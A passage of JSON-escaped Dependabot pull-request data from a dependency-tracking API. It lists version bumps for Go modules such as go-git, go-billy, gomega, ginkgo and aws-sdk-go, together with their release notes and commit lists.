baseDir on creation by \u003ca href=\"https://github.com/pjbgf\"\u003e\u003ccode\u003e@​pjbgf\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/go-git/go-billy/pull/205\"\u003ego-git/go-billy#205\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRun go-git tests as part of integration tests by \u003ca href=\"https://github.com/pjbgf\"\u003e\u003ccode\u003e@​pjbgf\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/go-git/go-billy/pull/206\"\u003ego-git/go-billy#206\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/go-git/go-billy/compare/v5.8.0...v5.9.0\"\u003ehttps://github.com/go-git/go-billy/compare/v5.8.0...v5.9.0\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-git/go-billy/commit/237e529bb8de61704047f71a5ab1c8e6676492f1\"\u003e\u003ccode\u003e237e529\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/go-git/go-billy/issues/206\"\u003e#206\u003c/a\u003e from pjbgf/v5-improvements\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-git/go-billy/commit/04edb394b39979b5cbdec30ded6abdcb9f7786c5\"\u003e\u003ccode\u003e04edb39\u003c/code\u003e\u003c/a\u003e build: Add go-git integration test\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-git/go-billy/commit/d8efefd33b2e8eeea1030e317bb0d71c5e918270\"\u003e\u003ccode\u003ed8efefd\u003c/code\u003e\u003c/a\u003e osfs: preserve empty ChrootOS base\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-git/go-billy/commit/07f2a0bf50e42d438d1d9d263c3c8a22598985b8\"\u003e\u003ccode\u003e07f2a0b\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/go-git/go-billy/issues/205\"\u003e#205\u003c/a\u003e from pjbgf/v5-improvements\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-git/go-billy/commit/25207c8468f1af656953cb5db7030aad5df1fe99\"\u003e\u003ccode\u003e25207c8\u003c/code\u003e\u003c/a\u003e build: Bump Go versions in workflows\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-git/go-billy/commit/2fda229d9ac0cb5ba654ebc824cfbb90248f82d9\"\u003e\u003ccode\u003e2fda229\u003c/code\u003e\u003c/a\u003e osfs: ChrootOS eval baseDir on creation\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-git/go-billy/commit/427b27f32f22de11498a682c65cd5060a01ec168\"\u003e\u003ccode\u003e427b27f\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/go-git/go-billy/issues/203\"\u003e#203\u003c/a\u003e from pjbgf/v5-improvements\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-git/go-billy/commit/7d5a23ece03edc171c1f63c8fa73f84c8428bf17\"\u003e\u003ccode\u003e7d5a23e\u003c/code\u003e\u003c/a\u003e chroot: Reject symlink loops\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-git/go-billy/commit/2c2287a233d2ee1e6cdce8956141f6d10505f3bf\"\u003e\u003ccode\u003e2c2287a\u003c/code\u003e\u003c/a\u003e util: avoid following symlinks in RemoveAll fallback\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-git/go-billy/commit/cbd88e9a9a2d7fe1065bbe083d8bf0c5fd7290de\"\u003e\u003ccode\u003ecbd88e9\u003c/code\u003e\u003c/a\u003e Fix mount path handling\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/go-git/go-billy/compare/v5.8.0...v5.9.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/go-git/go-git/v5` from 5.18.0 to 5.19.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/go-git/go-git/releases\"\u003egithub.com/go-git/go-git/v5's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev5.19.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003ebuild: Update module github.com/go-git/go-git/v5 to v5.18.0 [SECURITY] (releases/v5.x) by \u003ca href=\"https://github.com/go-git-renovate\"\u003e\u003ccode\u003e@​go-git-renovate\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/go-git/go-git/pull/2010\"\u003ego-git/go-git#2010\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ev5: Bump sha1cd and go-billy by \u003ca href=\"https://github.com/pjbgf\"\u003e\u003ccode\u003e@​pjbgf\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/go-git/go-git/pull/2060\"\u003ego-git/go-git#2060\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ev5: Align object encoding with upstream by \u003ca href=\"https://github.com/pjbgf\"\u003e\u003ccode\u003e@​pjbgf\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/go-git/go-git/pull/2065\"\u003ego-git/go-git#2065\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/go-git/go-git/compare/v5.18.0...v5.19.0\"\u003ehttps://github.com/go-git/go-git/compare/v5.18.0...v5.19.0\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-git/go-git/commit/bc930f4cbe095a3e1d49273655f73fcef7d41a42\"\u003e\u003ccode\u003ebc930f4\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/go-git/go-git/issues/2065\"\u003e#2065\u003c/a\u003e from go-git/commit-v5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-git/go-git/commit/d315264343cead712aa9eb56475c2ec96f5ecef1\"\u003e\u003ccode\u003ed315264\u003c/code\u003e\u003c/a\u003e plumbing: object, Reset object before decode\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-git/go-git/commit/6e1d34890a4dae8a0df738e531234bd60b7e9b66\"\u003e\u003ccode\u003e6e1d348\u003c/code\u003e\u003c/a\u003e plumbing: object, Align Tree handling with upstream\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-git/go-git/commit/e134ba34cf95ed0167e5b1df36a933d7bde9d02d\"\u003e\u003ccode\u003ee134ba3\u003c/code\u003e\u003c/a\u003e tests: Skip double checks in Git v2.11\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-git/go-git/commit/1971422f6b1bec9176061b3293306981cfff981e\"\u003e\u003ccode\u003e1971422\u003c/code\u003e\u003c/a\u003e tests: Add git conformance tests for signing verification\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-git/go-git/commit/a387aa8857a8fbba8e74b7f5485e9e030669ab5d\"\u003e\u003ccode\u003ea387aa8\u003c/code\u003e\u003c/a\u003e plumbing: object, Add ErrMalformedTag\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-git/go-git/commit/f415670d906b5c6169d1fdc64f3f9f1d33eb6f9c\"\u003e\u003ccode\u003ef415670\u003c/code\u003e\u003c/a\u003e plumbing: object, Decode Tag headers via a state machine\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-git/go-git/commit/5b0cd38a62e2336bb5f1a2ad0eb8ac8f9e7b740e\"\u003e\u003ccode\u003e5b0cd38\u003c/code\u003e\u003c/a\u003e plumbing: object, Reject multi-signature commits at Verify\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-git/go-git/commit/fe8ed6223a6079d9fd84d853362a996e7df175fb\"\u003e\u003ccode\u003efe8ed62\u003c/code\u003e\u003c/a\u003e plumbing: object, Align Tag.EncodeWithoutSignature with Commit\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-git/go-git/commit/98e337d5bdc4c0536a40ab7381b2231f7e0b15cd\"\u003e\u003ccode\u003e98e337d\u003c/code\u003e\u003c/a\u003e plumbing: object, Add support for Tag.SignatureSHA256\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/go-git/go-git/compare/v5.18.0...v5.19.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/onsi/gomega` from 1.38.2 to 1.40.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/onsi/gomega/releases\"\u003egithub.com/onsi/gomega's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.40.0\u003c/h2\u003e\n\u003ch2\u003e1.40.0\u003c/h2\u003e\n\u003cp\u003eWe're adopting a new release strategy to minimize dependency bloat in projects that consume Gomega.  It is a limitation of the go mod toolchain that \u003cem\u003etest\u003c/em\u003e subdependencies of your project's direct dependencies get pulled in as \u003cem\u003eindirect\u003c/em\u003e dependencies.  In the case of Gomega, this ends up pulling in all of Ginkgo into your \u003ccode\u003ego.mod\u003c/code\u003e even if you are only using Gomega (Gomega uses Ginkgo for its own tests).\u003c/p\u003e\n\u003cp\u003eGoing forward, releases will strip out all tests, tidy up the \u003ccode\u003ego.mod\u003c/code\u003e and then push this stripped down version to a new \u003ccode\u003emaster-lite\u003c/code\u003e branch.  These stripped-down versions will receive the \u003ccode\u003evx.y.z\u003c/code\u003e git tag and will be picked up by the go toolchain.\u003c/p\u003e\n\u003cp\u003ePlease open an issue if this new release process causes unexpected changes for your projects.\u003c/p\u003e\n\u003ch2\u003ev1.39.1\u003c/h2\u003e\n\u003ch2\u003e1.39.1\u003c/h2\u003e\n\u003cp\u003eUpdate all dependencies.  This auto-updated the required version of Go to 1.24, consistent with the fact that Go 1.23 has been out of support for almost six months.\u003c/p\u003e\n\u003ch2\u003ev1.39.0\u003c/h2\u003e\n\u003ch2\u003e1.39.0\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cp\u003eAdd \u003ccode\u003eMatchErrorStrictly\u003c/code\u003e which only passes if \u003ccode\u003eerrors.Is(actual, expected)\u003c/code\u003e returns true.  \u003ccode\u003eMatchError\u003c/code\u003e, by contrast, will fallback to string comparison.\u003c/p\u003e\n\u003ch2\u003ev1.38.3\u003c/h2\u003e\n\u003ch2\u003e1.38.3\u003c/h2\u003e\n\u003ch3\u003eFixes\u003c/h3\u003e...\n\n_Description has been truncated_","html_url":"https://github.com/simple-container-com/api/pull/252","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/simple-container-com%2Fapi/issues/252","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/252/packages"},{"uuid":"4417965683","node_id":"PR_kwDOJqDRWc7aGh9a","number":6,"state":"open","title":"Bump the dependencies group with 5 updates","user":"dependabot[bot]","labels":[],"assignees":[],"locked":false,"comments_count":3,"pull_request":true,"closed_at":null,"author_association":null,"state_reason":null,"created_at":"2026-05-11T03:57:05.000Z","updated_at":"2026-05-19T23:14:16.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"Bump","group_name":"dependencies","update_count":5,"packages":[{"name":"github.com/aws/aws-sdk-go","old_version":"1.49.19","new_version":"1.55.8","repository_url":"https://github.com/aws/aws-sdk-go"},{"name":"github.com/onsi/ginkgo/v2","old_version":"2.13.2","new_version":"2.15.0","repository_url":"https://github.com/onsi/ginkgo"},{"name":"github.com/onsi/gomega","old_version":"1.29.0","new_version":"1.31.1","repository_url":"https://github.com/onsi/gomega"},{"name":"github.com/google/go-cmp","old_version":"0.6.0","new_version":"0.7.0","repository_url":"https://github.com/google/go-cmp"},{"name":"golang.org/x/sync","old_version":"0.6.0","new_version":"0.20.0","repository_url":"https://github.com/golang/sync"}],"path":null,"ecosystem":"go"},"body":"Bumps the dependencies group with 5 updates:\n\n| Package | From | To |\n| --- | --- | --- |\n| [github.com/aws/aws-sdk-go](https://github.com/aws/aws-sdk-go) | `1.49.19` | `1.55.8` |\n| [github.com/onsi/ginkgo/v2](https://github.com/onsi/ginkgo) | `2.13.2` | `2.15.0` |\n| [github.com/onsi/gomega](https://github.com/onsi/gomega) | `1.29.0` | `1.31.1` |\n| [github.com/google/go-cmp](https://github.com/google/go-cmp) | `0.6.0` | `0.7.0` |\n| [golang.org/x/sync](https://github.com/golang/sync) | `0.6.0` | `0.20.0` |\n\nUpdates `github.com/aws/aws-sdk-go` from 1.49.19 to 1.55.8\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/aws/aws-sdk-go/releases\"\u003egithub.com/aws/aws-sdk-go's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003eRelease v1.55.8 (2025-07-31)\u003c/h1\u003e\n\u003ch3\u003eSDK Features\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eMark the module and all packages as deprecated.\n\u003cul\u003e\n\u003cli\u003eThis SDK has entered end-of-support.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease v1.55.7 (2025-04-22)\u003c/h1\u003e\n\u003ch3\u003eSDK Bugs\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eservice/s3/s3manager\u003c/code\u003e: Abort multipart download if object is modified during download\n\u003cul\u003e\n\u003cli\u003eFixes \u003ca href=\"https://redirect.github.com/aws/aws-sdk-go/issues/4986\"\u003e4986\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease v1.55.6 (2025-01-15)\u003c/h1\u003e\n\u003ch3\u003eSDK Bugs\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix broken printf for go1.24\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease v1.55.5 (2024-07-30)\u003c/h1\u003e\n\u003ch3\u003eService Client Updates\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eservice/appstream\u003c/code\u003e: Updates service API and documentation\n\u003cul\u003e\n\u003cli\u003eAdded support for Red Hat Enterprise Linux 8 on Amazon AppStream 2.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/autoscaling\u003c/code\u003e: Updates service API and documentation\n\u003cul\u003e\n\u003cli\u003eIncrease the length limit for VPCZoneIdentifier from 2047 to 5000\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/codepipeline\u003c/code\u003e: Updates service API, documentation, and paginators\n\u003cul\u003e\n\u003cli\u003eAWS CodePipeline V2 type pipelines now support stage level conditions to enable development teams to safely release changes that meet quality and compliance requirements.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/elasticache\u003c/code\u003e: Updates service documentation\n\u003cul\u003e\n\u003cli\u003eDoc only update for changes to deletion API.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/elasticloadbalancing\u003c/code\u003e: Updates service API\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/eventbridge\u003c/code\u003e: Updates service API\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/logs\u003c/code\u003e: Updates service API\n\u003cul\u003e\n\u003cli\u003eAdd v2 smoke tests and smithy smokeTests trait for SDK testing.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/models.lex.v2\u003c/code\u003e: Updates service API and documentation\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/rolesanywhere\u003c/code\u003e: Updates service API and documentation\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/tnb\u003c/code\u003e: Updates service API and documentation\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/workspaces\u003c/code\u003e: Updates service documentation\n\u003cul\u003e\n\u003cli\u003eRemoving multi-session as it isn't supported for pools\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease v1.55.4 (2024-07-29)\u003c/h1\u003e\n\u003ch3\u003eService Client Updates\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eservice/elasticache\u003c/code\u003e: Updates service documentation\n\u003cul\u003e\n\u003cli\u003eRenaming full service name as it appears in developer documentation.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/memorydb\u003c/code\u003e: Updates service API and documentation\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/070853e88d22854d2355c2543d0958a5f76ad407\"\u003e\u003ccode\u003e070853e\u003c/code\u003e\u003c/a\u003e release v1.55.8 (2025-07-31)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/bb0168ecfa52f8809b27912ded94edafaa019512\"\u003e\u003ccode\u003ebb0168e\u003c/code\u003e\u003c/a\u003e Add deprecation warnings everywhere and remove some README content\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/7ce44f3b563e6c00488bc9c81fb12ef232d72d93\"\u003e\u003ccode\u003e7ce44f3\u003c/code\u003e\u003c/a\u003e aws\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/6d9a26d85968c06f7e83b3233c5454b93c1ccfd8\"\u003e\u003ccode\u003e6d9a26d\u003c/code\u003e\u003c/a\u003e remove doc issue tmpl\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/239002f260fd543fe03fbd154d3033777d2bcd30\"\u003e\u003ccode\u003e239002f\u003c/code\u003e\u003c/a\u003e deprecate service packages and HLLs\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/70c4177b8fdf98fa35e7286fd7881276d7490540\"\u003e\u003ccode\u003e70c4177\u003c/code\u003e\u003c/a\u003e deprecate main runtime packages\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/bbdd4e9bc5e4f2795f25486b84b202d689efc632\"\u003e\u003ccode\u003ebbdd4e9\u003c/code\u003e\u003c/a\u003e deprecate\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/163aada692ed32951f979aacf452ded4c03b8a7c\"\u003e\u003ccode\u003e163aada\u003c/code\u003e\u003c/a\u003e release v1.55.7 (2025-04-22) (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go/issues/5346\"\u003e#5346\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/9eb2bfd2f949fc81b96cee6b5aae6d9b84abea75\"\u003e\u003ccode\u003e9eb2bfd\u003c/code\u003e\u003c/a\u003e Abort multi part download if the object is modified during download\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/8d203ccff393340d080be0417d091cc60354449b\"\u003e\u003ccode\u003e8d203cc\u003c/code\u003e\u003c/a\u003e Update bug-report.yml\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go/compare/v1.49.19...v1.55.8\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/onsi/ginkgo/v2` from 2.13.2 to 2.15.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/onsi/ginkgo/releases\"\u003egithub.com/onsi/ginkgo/v2's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev2.15.0\u003c/h2\u003e\n\u003ch2\u003e2.15.0\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eJUnit reports now interpret Label(owner:X) and set owner to X. [8f3bd70]\u003c/li\u003e\n\u003cli\u003einclude cancellation reason when cancelling spec context [96e915c]\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eemit output of failed go tool cover invocation so users can try to debug things for themselves [c245d09]\u003c/li\u003e\n\u003cli\u003efix outline when using nodot in ginkgo v2 [dca77c8]\u003c/li\u003e\n\u003cli\u003eDocument areas where GinkgoT() behaves differently from testing.T [dbaf18f]\u003c/li\u003e\n\u003cli\u003ebugfix(docs): use Unsetenv instead of Clearenv (\u003ca href=\"https://redirect.github.com/onsi/ginkgo/issues/1337\"\u003e#1337\u003c/a\u003e) [6f67a14]\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eMaintenance\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eBump to go 1.20 [4fcd0b3]\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.14.0\u003c/h2\u003e\n\u003ch2\u003e2.14.0\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cp\u003eYou can now use \u003ccode\u003eGinkgoTB()\u003c/code\u003e when you need an instance of \u003ccode\u003etesting.TB\u003c/code\u003e to pass to a library.\u003c/p\u003e\n\u003cp\u003ePrior to this release table testing only supported generating individual \u003ccode\u003eIt\u003c/code\u003es for each test entry.  \u003ccode\u003eDescribeTableSubtree\u003c/code\u003e extends table testing support to entire testing subtrees - under the hood \u003ccode\u003eDescrieTableSubtree\u003c/code\u003e generates a new container for each entry and invokes your function to fill our the container.  See the \u003ca href=\"https://onsi.github.io/ginkgo/#generating-subtree-tables\"\u003edocs\u003c/a\u003e to learn more.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eIntroduce DescribeTableSubtree [65ec56d]\u003c/li\u003e\n\u003cli\u003eadd GinkgoTB() to docs [4a2c832]\u003c/li\u003e\n\u003cli\u003eAdd GinkgoTB() function (\u003ca href=\"https://redirect.github.com/onsi/ginkgo/issues/1333\"\u003e#1333\u003c/a\u003e) [92b6744]\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix typo in internal/suite.go (\u003ca href=\"https://redirect.github.com/onsi/ginkgo/issues/1332\"\u003e#1332\u003c/a\u003e) [beb9507]\u003c/li\u003e\n\u003cli\u003eFix typo in docs/index.md (\u003ca href=\"https://redirect.github.com/onsi/ginkgo/issues/1319\"\u003e#1319\u003c/a\u003e) [4ac3a13]\u003c/li\u003e\n\u003cli\u003eallow wasm to compile with ginkgo present (\u003ca href=\"https://redirect.github.com/onsi/ginkgo/issues/1311\"\u003e#1311\u003c/a\u003e) [b2e5bc5]\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eMaintenance\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eBump golang.org/x/tools from 0.16.0 to 0.16.1 (\u003ca href=\"https://redirect.github.com/onsi/ginkgo/issues/1316\"\u003e#1316\u003c/a\u003e) [465a8ec]\u003c/li\u003e\n\u003cli\u003eBump actions/setup-go from 4 to 5 (\u003ca href=\"https://redirect.github.com/onsi/ginkgo/issues/1313\"\u003e#1313\u003c/a\u003e) [eab0e40]\u003c/li\u003e\n\u003cli\u003eBump github/codeql-action from 2 to 3 (\u003ca href=\"https://redirect.github.com/onsi/ginkgo/issues/1317\"\u003e#1317\u003c/a\u003e) [fbf9724]\u003c/li\u003e\n\u003cli\u003eBump golang.org/x/crypto (\u003ca href=\"https://redirect.github.com/onsi/ginkgo/issues/1318\"\u003e#1318\u003c/a\u003e) [3ee80ee]\u003c/li\u003e\n\u003cli\u003eBump golang.org/x/tools from 0.14.0 to 0.16.0 (\u003ca href=\"https://redirect.github.com/onsi/ginkgo/issues/1306\"\u003e#1306\u003c/a\u003e) [123e1d5]\u003c/li\u003e\n\u003cli\u003eBump github.com/onsi/gomega from 1.29.0 to 1.30.0 (\u003ca href=\"https://redirect.github.com/onsi/ginkgo/issues/1297\"\u003e#1297\u003c/a\u003e) [558f6e0]\u003c/li\u003e\n\u003cli\u003eBump golang.org/x/net from 0.17.0 to 0.19.0 (\u003ca href=\"https://redirect.github.com/onsi/ginkgo/issues/1307\"\u003e#1307\u003c/a\u003e) [84ff7f3]\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/onsi/ginkgo/blob/master/CHANGELOG.md\"\u003egithub.com/onsi/ginkgo/v2's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.15.0\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eJUnit reports now interpret Label(owner:X) and set owner to X. [8f3bd70]\u003c/li\u003e\n\u003cli\u003einclude cancellation reason when cancelling spec context [96e915c]\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eemit output of failed go tool cover invocation so users can try to debug things for themselves [c245d09]\u003c/li\u003e\n\u003cli\u003efix outline when using nodot in ginkgo v2 [dca77c8]\u003c/li\u003e\n\u003cli\u003eDocument areas where GinkgoT() behaves differently from testing.T [dbaf18f]\u003c/li\u003e\n\u003cli\u003ebugfix(docs): use Unsetenv instead of Clearenv (\u003ca href=\"https://redirect.github.com/onsi/ginkgo/issues/1337\"\u003e#1337\u003c/a\u003e) [6f67a14]\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eMaintenance\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eBump to go 1.20 [4fcd0b3]\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.14.0\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cp\u003eYou can now use \u003ccode\u003eGinkgoTB()\u003c/code\u003e when you need an instance of \u003ccode\u003etesting.TB\u003c/code\u003e to pass to a library.\u003c/p\u003e\n\u003cp\u003ePrior to this release table testing only supported generating individual \u003ccode\u003eIt\u003c/code\u003es for each test entry.  \u003ccode\u003eDescribeTableSubtree\u003c/code\u003e extends table testing support to entire testing subtrees - under the hood \u003ccode\u003eDescrieTableSubtree\u003c/code\u003e generates a new container for each entry and invokes your function to fill our the container.  See the \u003ca href=\"https://onsi.github.io/ginkgo/#generating-subtree-tables\"\u003edocs\u003c/a\u003e to learn more.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eIntroduce DescribeTableSubtree [65ec56d]\u003c/li\u003e\n\u003cli\u003eadd GinkgoTB() to docs [4a2c832]\u003c/li\u003e\n\u003cli\u003eAdd GinkgoTB() function (\u003ca href=\"https://redirect.github.com/onsi/ginkgo/issues/1333\"\u003e#1333\u003c/a\u003e) [92b6744]\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix typo in internal/suite.go (\u003ca href=\"https://redirect.github.com/onsi/ginkgo/issues/1332\"\u003e#1332\u003c/a\u003e) [beb9507]\u003c/li\u003e\n\u003cli\u003eFix typo in docs/index.md (\u003ca href=\"https://redirect.github.com/onsi/ginkgo/issues/1319\"\u003e#1319\u003c/a\u003e) [4ac3a13]\u003c/li\u003e\n\u003cli\u003eallow wasm to compile with ginkgo present (\u003ca href=\"https://redirect.github.com/onsi/ginkgo/issues/1311\"\u003e#1311\u003c/a\u003e) [b2e5bc5]\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eMaintenance\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eBump golang.org/x/tools from 0.16.0 to 0.16.1 (\u003ca href=\"https://redirect.github.com/onsi/ginkgo/issues/1316\"\u003e#1316\u003c/a\u003e) 